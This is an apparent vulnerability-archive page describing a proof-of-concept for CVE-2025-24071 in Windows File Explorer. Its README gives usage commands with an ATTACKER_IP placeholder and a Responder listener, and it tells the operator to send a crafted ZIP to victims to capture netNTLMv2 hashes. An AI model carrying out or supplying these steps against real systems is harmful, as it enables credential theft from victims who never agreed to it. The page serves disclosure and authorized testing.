关联漏洞
标题:
Microsoft Windows File Explorer 信息泄露漏洞
(CVE-2025-24071)
描述:Microsoft Windows File Explorer是美国微软(Microsoft)公司的一个文件管理器应用程序。 Microsoft Windows File Explorer存在信息泄露漏洞。攻击者利用该漏洞可以获取敏感信息。以下产品和版本受到影响:Windows 10 Version 1809 for 32-bit Systems,Windows 10 Version 1809 for x64-based Systems,Windows Server 2019,Windows Server
介绍
# CVE-2025-24071
This Python script is designed to demonstrate the **CVE-2025-24071** vulnerability in Windows Explorer. This vulnerability allows an attacker to capture **netNTLMv2** credentials from a victim without any direct interaction from the victim.
## Description
The **CVE-2025-24071** vulnerability exists in the way Windows handles `.library-ms` files inside ZIP archives. When a ZIP file containing a malicious `.library-ms` file is extracted, Windows automatically attempts to access an SMB location specified in the file, which may result in exposing the victim's credentials to the attacker's server.
This script generates a ZIP file containing a malicious `.library-ms` file. When a victim extracts the ZIP file, the system automatically tries to connect to the SMB location specified in the file, sending **netNTLMv2** credentials to the attacker without any interaction from the victim.
## How It Works
1. The script takes the **attacker's IP address** as an argument and inserts it into an XML file that defines a `.library-ms` file. This file instructs Windows to connect to a shared resource at the attacker's IP address.
2. The `.library-ms` file is then placed inside a ZIP file named `exploit.zip`.
3. When the victim extracts the ZIP file, Windows processes the `.library-ms` file and, due to the vulnerability, automatically establishes an SMB connection to the attacker's server.
4. The attacker can capture the **netNTLMv2** credentials using tools like **Responder**, without the victim needing to take any action.
## Requirements
- Python 3.x
- Modules: `zipfile`, `os`, `argparse`
## Usage
1. **Generate the malicious file**:
```bash
python exploit.py --ip <ATTACKER_IP>
```
2. Once the malicious file is generated, ensure that Responder is running and listening for the **netNTLMv2** hashes.
```bash
responder -I <INTERFACE>
```
3. Send the generated `exploit.zip` file to the victim. When they extract the file, Windows will attempt to connect to the SMB server specified in the `.library-ms` file.
4. Once the victim extracts the ZIP file and Windows attempts the SMB connection, **Responder** will capture the **netNTLMv2** hashes from the victim.
## Disclaimer
This script is intended for educational and testing purposes in controlled environments. The malicious use of this vulnerability may be illegal and against the laws and regulations of many countries. Use this script only on systems that you have permission to audit and always with proper authorization.
文件快照
[4.0K] /data/pocs/a859d556d51a34d116d1a0c98499ddf7a2e9d201
├── [ 947] poc.py
└── [2.5K] README.md
0 directories, 2 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。